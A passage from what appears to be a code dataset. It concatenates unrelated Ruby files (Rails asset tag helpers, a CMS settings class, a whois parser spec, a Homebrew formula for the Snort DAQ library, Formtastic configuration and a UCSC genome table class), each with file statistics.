if !(type == :rss || type == :atom || type == :json) && tag_options[:type].blank?
raise ArgumentError.new("You should pass :type tag_option key explicitly, because you have passed #{type} type other than :rss, :atom, or :json.")
end
tag(
"link",
"rel" => tag_options[:rel] || "alternate",
"type" => tag_options[:type] || Template::Types[type].to_s,
"title" => tag_options[:title] || type.to_s.upcase,
"href" => url_options.is_a?(Hash) ? url_for(url_options.merge(only_path: false)) : url_options
)
end
# Returns a link tag for a favicon managed by the asset pipeline.
#
# If a page has no link like the one generated by this helper, browsers
# ask for <tt>/favicon.ico</tt> automatically, and cache the file if the
# request succeeds. If the favicon changes it is hard to get it updated.
#
# To have better control applications may let the asset pipeline manage
# their favicon storing the file under <tt>app/assets/images</tt>, and
# using this helper to generate its corresponding link tag.
#
# The helper gets the name of the favicon file as first argument, which
# defaults to "favicon.ico", and also supports +:rel+ and +:type+ options
# to override their defaults, "shortcut icon" and "image/x-icon"
# respectively:
#
# favicon_link_tag
# # => <link href="/assets/favicon.ico" rel="shortcut icon" type="image/x-icon" />
#
# favicon_link_tag 'myicon.ico'
# # => <link href="/assets/myicon.ico" rel="shortcut icon" type="image/x-icon" />
#
# Mobile Safari looks for a different link tag, pointing to an image that
# will be used if you add the page to the home screen of an iOS device.
# The following call would generate such a tag:
#
# favicon_link_tag 'mb-icon.png', rel: 'apple-touch-icon', type: 'image/png'
# # => <link href="/assets/mb-icon.png" rel="apple-touch-icon" type="image/png" />
def favicon_link_tag(source = "favicon.ico", options = {})
tag("link", {
rel: "shortcut icon",
type: "image/x-icon",
href: path_to_image(source, skip_pipeline: options.delete(:skip_pipeline))
}.merge!(options.symbolize_keys))
end
# Returns a link tag that browsers can use to preload the +source+.
# The +source+ can be the path of a resource managed by asset pipeline,
# a full path, or an URI.
#
# ==== Options
#
# * <tt>:type</tt> - Override the auto-generated mime type, defaults to the mime type for +source+ extension.
# * <tt>:as</tt> - Override the auto-generated value for as attribute, calculated using +source+ extension and mime type.
# * <tt>:crossorigin</tt> - Specify the crossorigin attribute, required to load cross-origin resources.
# * <tt>:nopush</tt> - Specify if the use of server push is not desired for the resource. Defaults to +false+.
# * <tt>:integrity</tt> - Specify the integrity attribute.
#
# ==== Examples
#
# preload_link_tag("custom_theme.css")
# # => <link rel="preload" href="/assets/custom_theme.css" as="style" type="text/css" />
#
# preload_link_tag("/videos/video.webm")
# # => <link rel="preload" href="/videos/video.mp4" as="video" type="video/webm" />
#
# preload_link_tag(post_path(format: :json), as: "fetch")
# # => <link rel="preload" href="/posts.json" as="fetch" type="application/json" />
#
# preload_link_tag("worker.js", as: "worker")
# # => <link rel="preload" href="/assets/worker.js" as="worker" type="text/javascript" />
#
# preload_link_tag("//example.com/font.woff2")
# # => <link rel="preload" href="//example.com/font.woff2" as="font" type="font/woff2" crossorigin="anonymous"/>
#
# preload_link_tag("//example.com/font.woff2", crossorigin: "use-credentials")
# # => <link rel="preload" href="//example.com/font.woff2" as="font" type="font/woff2" crossorigin="use-credentials" />
#
# preload_link_tag("/media/audio.ogg", nopush: true)
# # => <link rel="preload" href="/media/audio.ogg" as="audio" type="audio/ogg" />
#
def preload_link_tag(source, options = {})
href = asset_path(source, skip_pipeline: options.delete(:skip_pipeline))
extname = File.extname(source).downcase.delete(".")
mime_type = options.delete(:type) || Template::Types[extname]&.to_s
as_type = options.delete(:as) || resolve_link_as(extname, mime_type)
crossorigin = options.delete(:crossorigin)
crossorigin = "anonymous" if crossorigin == true || (crossorigin.blank? && as_type == "font")
integrity = options[:integrity]
nopush = options.delete(:nopush) || false
link_tag = tag.link(**{
rel: "preload",
href: href,
as: as_type,
type: mime_type,
crossorigin: crossorigin
}.merge!(options.symbolize_keys))
preload_link = "<#{href}>; rel=preload; as=#{as_type}"
preload_link += "; type=#{mime_type}" if mime_type
preload_link += "; crossorigin=#{crossorigin}" if crossorigin
preload_link += "; integrity=#{integrity}" if integrity
preload_link += "; nopush" if nopush
send_preload_links_header([preload_link])
link_tag
end
# Returns an HTML image tag for the +source+. The +source+ can be a full
# path, a file, or an Active Storage attachment.
#
# ==== Options
#
# You can add HTML attributes using the +options+. The +options+ supports
# additional keys for convenience and conformance:
#
# * <tt>:size</tt> - Supplied as "{Width}x{Height}" or "{Number}", so "30x45" becomes
# width="30" and height="45", and "50" becomes width="50" and height="50".
# <tt>:size</tt> will be ignored if the value is not in the correct format.
# * <tt>:srcset</tt> - If supplied as a hash or array of <tt>[source, descriptor]</tt>
# pairs, each image path will be expanded before the list is formatted as a string.
#
# ==== Examples
#
# Assets (images that are part of your app):
#
# image_tag("icon")
# # => <img src="/assets/icon" />
# image_tag("icon.png")
# # => <img src="/assets/icon.png" />
# image_tag("icon.png", size: "16x10", alt: "Edit Entry")
# # => <img src="/assets/icon.png" width="16" height="10" alt="Edit Entry" />
# image_tag("/icons/icon.gif", size: "16")
# # => <img src="/icons/icon.gif" width="16" height="16" />
# image_tag("/icons/icon.gif", height: '32', width: '32')
# # => <img height="32" src="/icons/icon.gif" width="32" />
# image_tag("/icons/icon.gif", class: "menu_icon")
# # => <img class="menu_icon" src="/icons/icon.gif" />
# image_tag("/icons/icon.gif", data: { title: 'Rails Application' })
# # => <img data-title="Rails Application" src="/icons/icon.gif" />
# image_tag("icon.png", srcset: { "icon_2x.png" => "2x", "icon_4x.png" => "4x" })
# # => <img src="/assets/icon.png" srcset="/assets/icon_2x.png 2x, /assets/icon_4x.png 4x">
# image_tag("pic.jpg", srcset: [["pic_1024.jpg", "1024w"], ["pic_1980.jpg", "1980w"]], sizes: "100vw")
# # => <img src="/assets/pic.jpg" srcset="/assets/pic_1024.jpg 1024w, /assets/pic_1980.jpg 1980w" sizes="100vw">
#
# Active Storage blobs (images that are uploaded by the users of your app):
#
# image_tag(user.avatar)
# # => <img src="/rails/active_storage/blobs/.../tiger.jpg" />
# image_tag(user.avatar.variant(resize_to_limit: [100, 100]))
# # => <img src="/rails/active_storage/representations/.../tiger.jpg" />
# image_tag(user.avatar.variant(resize_to_limit: [100, 100]), size: '100')
# # => <img width="100" height="100" src="/rails/active_storage/representations/.../tiger.jpg" />
def image_tag(source, options = {})
options = options.symbolize_keys
check_for_image_tag_errors(options)
skip_pipeline = options.delete(:skip_pipeline)
options[:src] = resolve_image_source(source, skip_pipeline)
if options[:srcset] && !options[:srcset].is_a?(String)
options[:srcset] = options[:srcset].map do |src_path, size|
src_path = path_to_image(src_path, skip_pipeline: skip_pipeline)
"#{src_path} #{size}"
end.join(", ")
end
options[:width], options[:height] = extract_dimensions(options.delete(:size)) if options[:size]
options[:loading] ||= image_loading if image_loading
options[:decoding] ||= image_decoding if image_decoding
tag("img", options)
end
# Returns an HTML video tag for the +sources+. If +sources+ is a string,
# a single video tag will be returned. If +sources+ is an array, a video
# tag with nested source tags for each source will be returned. The
# +sources+ can be full paths or files that exist in your public videos
# directory.
#
# ==== Options
#
# When the last parameter is a hash you can add HTML attributes using that
# parameter. The following options are supported:
#
# * <tt>:poster</tt> - Set an image (like a screenshot) to be shown
# before the video loads. The path is calculated like the +src+ of +image_tag+.
# * <tt>:size</tt> - Supplied as "{Width}x{Height}" or "{Number}", so "30x45" becomes
# width="30" and height="45", and "50" becomes width="50" and height="50".
# <tt>:size</tt> will be ignored if the value is not in the correct format.
# * <tt>:poster_skip_pipeline</tt> will bypass the asset pipeline when using
# the <tt>:poster</tt> option instead using an asset in the public folder.
#
# ==== Examples
#
# video_tag("trailer")
# # => <video src="/videos/trailer"></video>
# video_tag("trailer.ogg")
# # => <video src="/videos/trailer.ogg"></video>
# video_tag("trailer.ogg", controls: true, preload: 'none')
# # => <video preload="none" controls="controls" src="/videos/trailer.ogg"></video>
# video_tag("trailer.m4v", size: "16x10", poster: "screenshot.png")
# # => <video src="/videos/trailer.m4v" width="16" height="10" poster="/assets/screenshot.png"></video>
# video_tag("trailer.m4v", size: "16x10", poster: "screenshot.png", poster_skip_pipeline: true)
# # => <video src="/videos/trailer.m4v" width="16" height="10" poster="screenshot.png"></video>
# video_tag("/trailers/hd.avi", size: "16x16")
# # => <video src="/trailers/hd.avi" width="16" height="16"></video>
# video_tag("/trailers/hd.avi", size: "16")
# # => <video height="16" src="/trailers/hd.avi" width="16"></video>
# video_tag("/trailers/hd.avi", height: '32', width: '32')
# # => <video height="32" src="/trailers/hd.avi" width="32"></video>
# video_tag("trailer.ogg", "trailer.flv")
# # => <video><source src="/videos/trailer.ogg" /><source src="/videos/trailer.flv" /></video>
# video_tag(["trailer.ogg", "trailer.flv"])
# # => <video><source src="/videos/trailer.ogg" /><source src="/videos/trailer.flv" /></video>
# video_tag(["trailer.ogg", "trailer.flv"], size: "160x120")
# # => <video height="120" width="160"><source src="/videos/trailer.ogg" /><source src="/videos/trailer.flv" /></video>
def video_tag(*sources)
options = sources.extract_options!.symbolize_keys
public_poster_folder = options.delete(:poster_skip_pipeline)
sources << options
multiple_sources_tag_builder("video", sources) do |tag_options|
tag_options[:poster] = path_to_image(tag_options[:poster], skip_pipeline: public_poster_folder) if tag_options[:poster]
tag_options[:width], tag_options[:height] = extract_dimensions(tag_options.delete(:size)) if tag_options[:size]
end
end
# Returns an HTML audio tag for the +sources+. If +sources+ is a string,
# a single audio tag will be returned. If +sources+ is an array, an audio
# tag with nested source tags for each source will be returned. The
# +sources+ can be full paths or files that exist in your public audios
# directory.
#
# When the last parameter is a hash you can add HTML attributes using that
# parameter.
#
# audio_tag("sound")
# # => <audio src="/audios/sound"></audio>
# audio_tag("sound.wav")
# # => <audio src="/audios/sound.wav"></audio>
# audio_tag("sound.wav", autoplay: true, controls: true)
# # => <audio autoplay="autoplay" controls="controls" src="/audios/sound.wav"></audio>
# audio_tag("sound.wav", "sound.mid")
# # => <audio><source src="/audios/sound.wav" /><source src="/audios/sound.mid" /></audio>
def audio_tag(*sources)
multiple_sources_tag_builder("audio", sources)
end
private
def multiple_sources_tag_builder(type, sources)
options = sources.extract_options!.symbolize_keys
skip_pipeline = options.delete(:skip_pipeline)
sources.flatten!
yield options if block_given?
if sources.size > 1
content_tag(type, options) do
safe_join sources.map { |source| tag("source", src: send("path_to_#{type}", source, skip_pipeline: skip_pipeline)) }
end
else
options[:src] = send("path_to_#{type}", sources.first, skip_pipeline: skip_pipeline)
content_tag(type, nil, options)
end
end
def resolve_image_source(source, skip_pipeline)
if source.is_a?(Symbol) || source.is_a?(String)
path_to_image(source, skip_pipeline: skip_pipeline)
else
polymorphic_url(source)
end
rescue NoMethodError => e
raise ArgumentError, "Can't resolve image into URL: #{e}"
end
def extract_dimensions(size)
size = size.to_s
if /\A\d+x\d+\z/.match?(size)
size.split("x")
elsif /\A\d+\z/.match?(size)
[size, size]
end
end
def check_for_image_tag_errors(options)
if options[:size] && (options[:height] || options[:width])
raise ArgumentError, "Cannot pass a :size option with a :height or :width option"
end
end
def resolve_link_as(extname, mime_type)
if extname == "js"
"script"
elsif extname == "css"
"style"
elsif extname == "vtt"
"track"
elsif (type = mime_type.to_s.split("/")[0]) && type.in?(%w(audio video font))
type
end
end
def send_preload_links_header(preload_links)
if respond_to?(:request) && request
request.send_early_hints("Link" => preload_links.join("\n"))
end
if respond_to?(:response) && response
response.headers["Link"] = [response.headers["Link"].presence, *preload_links].compact.join(",")
end
end
end
end
end
| 48.192446 | 156 | 0.608621 |
62089d9571b386b7f4a9738677a62a7f6be7f118 | 841 | module CMS
class Settings
DEFAULT_MODE = 'published'.freeze
def initialize(settings, session)
@settings = settings
@session = session
end
def render_draft_content?
admin? && cms_session.draft?
end
def admin?
valid_token?(user_cms_token)
end
def valid_token?(token)
token.present? && token == @settings.cms_token
end
def escape_html?
if render_draft_content?
@settings.cms_escape_draft_html?
else
@settings.cms_escape_published_html?
end
end
def content_for_store
@content_for_store ||= CMS::ContentForStore.new
end
private
def user_cms_token
@session[:cms_token]
end
def cms_session
ActiveSupport::StringInquirer.new(@session[:cms] || DEFAULT_MODE)
end
end
end
| 18.688889 | 73 | 0.637337 |
e865c0ea619b38af8db0f6a6790e1e6321b50d35 | 7,089 | # encoding: utf-8
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# /spec/fixtures/responses/whois.ati.tn/tn/status_registered.expected
#
# and regenerate the tests with the following rake task
#
# $ rake spec:generate
#
require 'spec_helper'
require 'whois/record/parser/whois.ati.tn.rb'
describe Whois::Record::Parser::WhoisAtiTn, "status_registered.expected" do
subject do
file = fixture("responses", "whois.ati.tn/tn/status_registered.txt")
part = Whois::Record::Part.new(body: File.read(file))
described_class.new(part)
end
describe "#disclaimer" do
it do
expect(subject.disclaimer).to eq("All rights reserved.\nCopyright \"Tunisian Internet Agency - http://whois.tn\"")
end
end
describe "#domain" do
it do
expect(subject.domain).to eq("google.tn")
end
end
describe "#domain_id" do
it do
expect { subject.domain_id }.to raise_error(Whois::AttributeNotSupported)
end
end
describe "#status" do
it do
expect(subject.status).to eq(:registered)
end
end
describe "#available?" do
it do
expect(subject.available?).to eq(false)
end
end
describe "#registered?" do
it do
expect(subject.registered?).to eq(true)
end
end
describe "#created_on" do
it do
expect(subject.created_on).to be_a(Time)
expect(subject.created_on).to eq(Time.parse("2009-05-14 00:00:00"))
end
end
describe "#updated_on" do
it do
expect { subject.updated_on }.to raise_error(Whois::AttributeNotSupported)
end
end
describe "#expires_on" do
it do
expect { subject.expires_on }.to raise_error(Whois::AttributeNotSupported)
end
end
describe "#registrar" do
it do
expect(subject.registrar).to be_a(Whois::Record::Registrar)
expect(subject.registrar.id).to eq(nil)
expect(subject.registrar.name).to eq("3S Global Net")
expect(subject.registrar.organization).to eq(nil)
expect(subject.registrar.url).to eq(nil)
end
end
describe "#registrant_contacts" do
it do
expect(subject.registrant_contacts).to be_a(Array)
expect(subject.registrant_contacts.size).to eq(1)
expect(subject.registrant_contacts[0]).to be_a(Whois::Record::Contact)
expect(subject.registrant_contacts[0].type).to eq(Whois::Record::Contact::TYPE_REGISTRANT)
expect(subject.registrant_contacts[0].id).to eq(nil)
expect(subject.registrant_contacts[0].name).to eq("GOOGLE Inc")
expect(subject.registrant_contacts[0].organization).to eq(nil)
expect(subject.registrant_contacts[0].address).to eq("PO BOX 2050 Moutain view CA 94042 USA")
expect(subject.registrant_contacts[0].city).to eq(nil)
expect(subject.registrant_contacts[0].zip).to eq(nil)
expect(subject.registrant_contacts[0].state).to eq(nil)
expect(subject.registrant_contacts[0].country).to eq(nil)
expect(subject.registrant_contacts[0].country_code).to eq(nil)
expect(subject.registrant_contacts[0].phone).to eq("+1 925 685 9600")
expect(subject.registrant_contacts[0].fax).to eq("+1 925 685 9620")
expect(subject.registrant_contacts[0].email).to eq("[email protected]")
expect(subject.registrant_contacts[0].created_on).to eq(Time.parse("2009-05-14 00:00:00"))
expect(subject.registrant_contacts[0].updated_on).to eq(Time.parse("2010-07-18 00:00:00"))
end
end
describe "#admin_contacts" do
it do
expect(subject.admin_contacts).to be_a(Array)
expect(subject.admin_contacts.size).to eq(1)
expect(subject.admin_contacts[0]).to be_a(Whois::Record::Contact)
expect(subject.admin_contacts[0].type).to eq(Whois::Record::Contact::TYPE_ADMINISTRATIVE)
expect(subject.admin_contacts[0].id).to eq(nil)
expect(subject.admin_contacts[0].name).to eq("GOOGLE Inc")
expect(subject.admin_contacts[0].organization).to eq(nil)
expect(subject.admin_contacts[0].address).to eq("PO BOX 2050 Moutain view CA 94042 USA")
expect(subject.admin_contacts[0].city).to eq(nil)
expect(subject.admin_contacts[0].zip).to eq(nil)
expect(subject.admin_contacts[0].state).to eq(nil)
expect(subject.admin_contacts[0].country).to eq(nil)
expect(subject.admin_contacts[0].country_code).to eq(nil)
expect(subject.admin_contacts[0].phone).to eq("+1 925 685 9600")
expect(subject.admin_contacts[0].fax).to eq("+1 925 685 9620")
expect(subject.admin_contacts[0].email).to eq("[email protected]")
expect(subject.admin_contacts[0].created_on).to eq(Time.parse("2009-05-14 00:00:00"))
expect(subject.admin_contacts[0].updated_on).to eq(Time.parse("2010-07-18 00:00:00"))
end
end
describe "#technical_contacts" do
it do
expect(subject.technical_contacts).to be_a(Array)
expect(subject.technical_contacts.size).to eq(1)
expect(subject.technical_contacts[0]).to be_a(Whois::Record::Contact)
expect(subject.technical_contacts[0].type).to eq(Whois::Record::Contact::TYPE_TECHNICAL)
expect(subject.technical_contacts[0].id).to eq(nil)
expect(subject.technical_contacts[0].name).to eq("GOOGLE Inc")
expect(subject.technical_contacts[0].organization).to eq(nil)
expect(subject.technical_contacts[0].address).to eq("PO BOX 2050 Moutain view CA 94042 USA")
expect(subject.technical_contacts[0].city).to eq(nil)
expect(subject.technical_contacts[0].zip).to eq(nil)
expect(subject.technical_contacts[0].state).to eq(nil)
expect(subject.technical_contacts[0].country).to eq(nil)
expect(subject.technical_contacts[0].country_code).to eq(nil)
expect(subject.technical_contacts[0].phone).to eq("+1 925 685 9600")
expect(subject.technical_contacts[0].fax).to eq("+1 925 685 9620")
expect(subject.technical_contacts[0].email).to eq("[email protected]")
expect(subject.technical_contacts[0].created_on).to eq(Time.parse("2009-05-14 00:00:00"))
expect(subject.technical_contacts[0].updated_on).to eq(Time.parse("2010-07-18 00:00:00"))
end
end
describe "#nameservers" do
it do
expect(subject.nameservers).to be_a(Array)
expect(subject.nameservers.size).to eq(4)
expect(subject.nameservers[0]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[0].name).to eq("ns1.google.com")
expect(subject.nameservers[0].ipv4).to eq("216.239.32.10")
expect(subject.nameservers[1]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[1].name).to eq("ns2.google.com")
expect(subject.nameservers[1].ipv4).to eq("216.239.34.10")
expect(subject.nameservers[2]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[2].name).to eq("ns3.google.com")
expect(subject.nameservers[2].ipv4).to eq("216.239.36.10")
expect(subject.nameservers[3]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[3].name).to eq("ns4.google.com")
expect(subject.nameservers[3].ipv4).to eq("216.239.38.10")
end
end
end
| 43.22561 | 120 | 0.703061 |
9150a0feb5b6e9391824cdfb3585389348e3207a | 1,795 | class Daq < Formula
desc "Network intrusion prevention and detection system"
homepage "https://www.snort.org/"
url "https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz"
sha256 "b40e1d1273e08aaeaa86e69d4f28d535b7e53bdb3898adf539266b63137be7cb"
bottle do
cellar :any
sha256 "d01c68e8ece0df01a1132b9591dad43a84381e601848915972fdbe9497ecada2" => :high_sierra
sha256 "f0be58035bc6f4764567cf186673035818e6025d027695795f959fdfc88c7806" => :sierra
sha256 "9c2720bd46954e9f2631801d8f8283974436a82827f01c9e954e319f0b9f7e88" => :el_capitan
sha256 "02d198f42f56471feaf127824230d7ea752490b3c7f5a34f8b50ff0a85062f01" => :yosemite
sha256 "8ce4fbbbb9f6189f6ee51d3223a81ebc7ea76069353bd284822989d6ccc364a5" => :mavericks
sha256 "bced15005e13eaa11ec6d47afbb1137f61231a191fb05a295e2762cc6cc8ef29" => :mountain_lion
end
# libpcap on >= 10.12 has pcap_lib_version() instead of pcap_version
# Reported 8 Oct 2017 to bugs AT snort DOT org
if MacOS.version >= :sierra
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/b345dac/daq/patch-pcap-version.diff"
sha256 "20d2bf6aec29824e2b7550f32251251cdc9d7aac3a0861e81a68cd0d1e513bf3"
end
end
def install
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make", "install"
end
test do
(testpath/"test.c").write <<-EOS.undent
#include <daq.h>
#include <stdio.h>
int main()
{
DAQ_Module_Info_t* list;
int size = daq_get_module_list(&list);
daq_free_module_list(list, size);
return 0;
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-ldaq", "-o", "test"
system "./test"
end
end
| 35.9 | 106 | 0.707521 |
d59edfa3d5cbc16f1f077d15a560b2d68d464682 | 1,253 | $:.unshift(File.expand_path('../../lib/', __FILE__))
require_relative '../lib/mkto_rest'
# or require 'mkto_gem' if you installed the gem
require 'yaml'
=begin
This script looks for the hostname, client id and key in .mktorest.
Create that file with the following (yaml) format:
---
:hostname: ''
:client_id: ''
:client_secret: ''
set your hostname, client id and key to the right values.
=end
config_path = File.expand_path(File.join(File.dirname(__FILE__),'..', '.mktorest'))
if File.exists? config_path
config = YAML::load_file(config_path)
else
print <<-EOF
"Set your hostname, client id and key in #{config_path} in this format:
#{{ hostname: '', client_id: '', client_secret: '' }.to_yaml}
EOF
exit 1
end
if ARGV.size < 1
print "#{__FILE__} <lead_email> \n e.g.: #{__FILE__} [email protected] \n\n"
exit 1
end
attr_v = ARGV.shift
values = {}
ARGV.each do |pair|
k, v = pair.split('=')
values[k] = v
end
client = MktoRest::Client.new(host: config[:hostname], client_id: config[:client_id], client_secret: config[:client_secret])
#client.debug = true #verbose output, helps debugging
# find leads, updated fields.
client.get_leads :email, attr_v do |lead|
p "id: #{lead.id}, email: #{lead.email}"
end
| 21.982456 | 124 | 0.682362 |
d5b55625a0675e94c6ee21c2fe82f19adb932d8b | 2,040 | require_relative '../../../libraries/helpers'
describe 'find_carbon_cache_services' do
let(:node) do
Hash[
'graphite' => {
'carbon' => {
'service_type' => 'runit',
'caches' => {
'a' => { 'line_reciever_port' => 2003 },
'b' => { 'line_reciever_port' => 2004 },
'c' => { 'line_receiver_port' => 2005 }
}
}
}
]
end
context 'when a single carbon-cache service is defined and run under runit' do
before do
node['graphite']['carbon']['caches'].delete('b')
node['graphite']['carbon']['caches'].delete('c')
end
it 'should return a single runit_service carbon-cache service name' do
caches = find_carbon_cache_services(node)
caches.should == [
'runit_service[carbon-cache-a]',
]
end
end
context 'when multiple carbon-cache services are defined and run under runit' do
it 'should return multiple runit_service carbon-cache service names' do
caches = find_carbon_cache_services(node)
caches.sort.should == [
'runit_service[carbon-cache-a]',
'runit_service[carbon-cache-b]',
'runit_service[carbon-cache-c]'
]
end
end
context 'when a single carbon-cache service is defined and not run under runit' do
before do
node['graphite']['carbon']['service_type'] = ""
node['graphite']['carbon']['caches'].delete('b')
node['graphite']['carbon']['caches'].delete('c')
end
it 'should return a single service carbon-cache service name' do
caches = find_carbon_cache_services(node)
caches.sort.should == ['service[carbon-cache]']
end
end
context 'when multiple carbon-cache services are defined and not run under runit' do
before do
node['graphite']['carbon']['service_type'] = ""
end
it 'should return a single service carbon-cache service name' do
caches = find_carbon_cache_services(node)
caches.sort.should == ['service[carbon-cache]']
end
end
end
| 29.565217 | 86 | 0.617647 |
39b7ef338276eea1f362725cf4a0984facbd06f6 | 6,276 | # encoding: utf-8
# Set the default text field size when input is a string. Default is nil.
# Formtastic::FormBuilder.default_text_field_size = 50
# Set the default text area height when input is a text. Default is 20.
# Formtastic::FormBuilder.default_text_area_height = 5
# Set the default text area width when input is a text. Default is nil.
# Formtastic::FormBuilder.default_text_area_width = 50
# Should all fields be considered "required" by default?
# Defaults to true.
# Formtastic::FormBuilder.all_fields_required_by_default = true
# Should select fields have a blank option/prompt by default?
# Defaults to true.
# Formtastic::FormBuilder.include_blank_for_select_by_default = true
# Set the string that will be appended to the labels/fieldsets which are required.
# It accepts string or procs and the default is a localized version of
# '<abbr title="required">*</abbr>'. In other words, if you configure formtastic.required
# in your locale, it will replace the abbr title properly. But if you don't want to use
# abbr tag, you can simply give a string as below.
# Formtastic::FormBuilder.required_string = "(required)"
# Set the string that will be appended to the labels/fieldsets which are optional.
# Defaults to an empty string ("") and also accepts procs (see required_string above).
# Formtastic::FormBuilder.optional_string = "(optional)"
# Set the way inline errors will be displayed.
# Defaults to :sentence, valid options are :sentence, :list, :first and :none
# Formtastic::FormBuilder.inline_errors = :sentence
# Formtastic uses the following classes as default for hints, inline_errors and error list
# If you override the class here, please ensure to override it in your stylesheets as well.
# Formtastic::FormBuilder.default_hint_class = "inline-hints"
# Formtastic::FormBuilder.default_inline_error_class = "inline-errors"
# Formtastic::FormBuilder.default_error_list_class = "errors"
# Set the method to call on label text to transform or format it for human-friendly
# reading when formtastic is used without object. Defaults to :humanize.
# Formtastic::FormBuilder.label_str_method = :humanize
# Set the array of methods to try calling on parent objects in :select and :radio inputs
# for the text inside each @<option>@ tag or alongside each radio @<input>@. The first method
# that is found on the object will be used.
# Defaults to ["to_label", "display_name", "full_name", "name", "title", "username", "login", "value", "to_s"]
# Formtastic::FormBuilder.collection_label_methods = [
# "to_label", "display_name", "full_name", "name", "title", "username", "login", "value", "to_s"]
# Specifies if labels/hints for input fields automatically be looked up using I18n.
# Default value: true. Overridden for specific fields by setting value to true,
# i.e. :label => true, or :hint => true (or opposite depending on initialized value)
# Formtastic::FormBuilder.i18n_lookups_by_default = false
# Specifies if I18n lookups of the default I18n Localizer should be cached to improve performance.
# Defaults to true.
# Formtastic::FormBuilder.i18n_cache_lookups = false
# Specifies the class to use for localization lookups. You can create your own
# class and use it instead by subclassing Formtastic::Localizer (which is the default).
# Formtastic::FormBuilder.i18n_localizer = MyOwnLocalizer
# You can add custom inputs or override parts of Formtastic by subclassing Formtastic::FormBuilder and
# specifying that class here. Defaults to Formtastic::FormBuilder.
# Formtastic::Helpers::FormHelper.builder = MyCustomBuilder
# All formtastic forms have a class that indicates that they are just that. You
# can change it to any class you want.
# Formtastic::Helpers::FormHelper.default_form_class = 'formtastic'
# Formtastic will infer a class name from the model, array, string or symbol you pass to the
# form builder. You can customize the way that class is presented by overriding
# this proc.
# Formtastic::Helpers::FormHelper.default_form_model_class_proc = proc { |model_class_name| model_class_name }
# Allows to set a custom field_error_proc wrapper. By default this wrapper
# is disabled since `formtastic` already adds an error class to the LI tag
# containing the input.
# Formtastic::Helpers::FormHelper.formtastic_field_error_proc = proc { |html_tag, instance_tag| html_tag }
# You can opt-in to Formtastic's use of the HTML5 `required` attribute on `<input>`, `<select>`
# and `<textarea>` tags by setting this to true (defaults to false).
# Formtastic::FormBuilder.use_required_attribute = false
# You can opt-in to new HTML5 browser validations (for things like email and url inputs) by setting
# this to true. Doing so will omit the `novalidate` attribute from the `<form>` tag.
# See https://diveintohtml5.org/forms.html#validation for more info.
# Formtastic::FormBuilder.perform_browser_validations = true
# By creating custom input class finder, you can change how input classes are looked up.
# For example you can make it to search for TextInputFilter instead of TextInput.
# See # TODO: add link # for more information
# NOTE: this behavior will be default from Formtastic 4.0
Formtastic::FormBuilder.input_class_finder = Formtastic::InputClassFinder
# Define custom namespaces in which to look up your Input classes. Default is
# to look up in the global scope and in Formtastic::Inputs.
# Formtastic::FormBuilder.input_namespaces = [ ::Object, ::MyInputsModule, ::Formtastic::Inputs ]
# By creating custom action class finder, you can change how action classes are looked up.
# For example you can make it to search for MyButtonAction instead of ButtonAction.
# See # TODO: add link # for more information
# NOTE: this behavior will be default from Formtastic 4.0
Formtastic::FormBuilder.action_class_finder = Formtastic::ActionClassFinder
# Define custom namespaces in which to look up your Action classes. Default is
# to look up in the global scope and in Formtastic::Actions.
# Formtastic::FormBuilder.action_namespaces = [ ::Object, ::MyActionsModule, ::Formtastic::Actions ]
# Which columns to skip when automatically rendering a form without any fields specified.
# Formtastic::FormBuilder.skipped_columns = [:created_at, :updated_at, :created_on, :updated_on, :lock_version, :version]
| 55.052632 | 121 | 0.775972 |
b9e0dcc177930b1ac84afb0fbd3733a0754cf991 | 3,109 | # Copyright::
# Copyright (C) 2011 MISHIMA, Hiroyuki <missy at be.to / hmishima at nagasaki-u.ac.jp>
# License:: The Ruby licence (Ryby's / GPLv2 dual)
#
# In the hg18 database, this table is actually separated
# into "chr1_*", "chr2_*", etc. This class dynamically
# define *::Chr1_*, *::Chr2_*, etc. The
# Rmsk.find_by_interval calls an appropreate class automatically.
module Bio
module Ucsc
module RheMac2
class ChainMm9
KLASS = "ChainMm9"
KLASS_S = KLASS[0..0].downcase + KLASS[1..-1]
Bio::Ucsc::RheMac2::CHROMS.each do |chr|
class_eval %!
class #{chr[0..0].upcase + chr[1..-1]}_#{KLASS} < DBConnection
self.table_name = "#{chr[0..0].downcase + chr[1..-1]}_#{KLASS_S}"
self.primary_key = nil
self.inheritance_column = nil
def self.find_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval)
find_first_or_all_by_interval(interval, :first, opt)
end
def self.find_all_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval)
find_first_or_all_by_interval(interval, :all, opt)
end
def self.find_first_or_all_by_interval(interval, first_all, opt); interval = Bio::Ucsc::Gi.wrap(interval)
zstart = interval.zero_start
zend = interval.zero_end
if opt[:partial] == true
where = <<-SQL
tName = :chrom
AND bin in (:bins)
AND ((tStart BETWEEN :zstart AND :zend)
OR (tEnd BETWEEN :zstart AND :zend)
OR (tStart <= :zstart AND tEnd >= :zend))
SQL
else
where = <<-SQL
tName = :chrom
AND bin in (:bins)
AND ((tStart BETWEEN :zstart AND :zend)
AND (tEnd BETWEEN :zstart AND :zend))
SQL
end
cond = {
:chrom => interval.chrom,
:bins => Bio::Ucsc::UcscBin.bin_all(zstart, zend),
:zstart => zstart,
:zend => zend,
}
self.find(first_all,
{ :select => "*",
:conditions => [where, cond], })
end
end
!
end # each chromosome
def self.find_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval)
chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1]
chr_klass = self.const_get("#{chrom}_#{KLASS}")
chr_klass.__send__(:find_by_interval, interval, opt)
end
def self.find_all_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval)
chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1]
chr_klass = self.const_get("#{chrom}_#{KLASS}")
chr_klass.__send__(:find_all_by_interval, interval, opt)
end
end # class
end # module Hg18
end # module Ucsc
end # module Bio
| 37.914634 | 120 | 0.547121 |
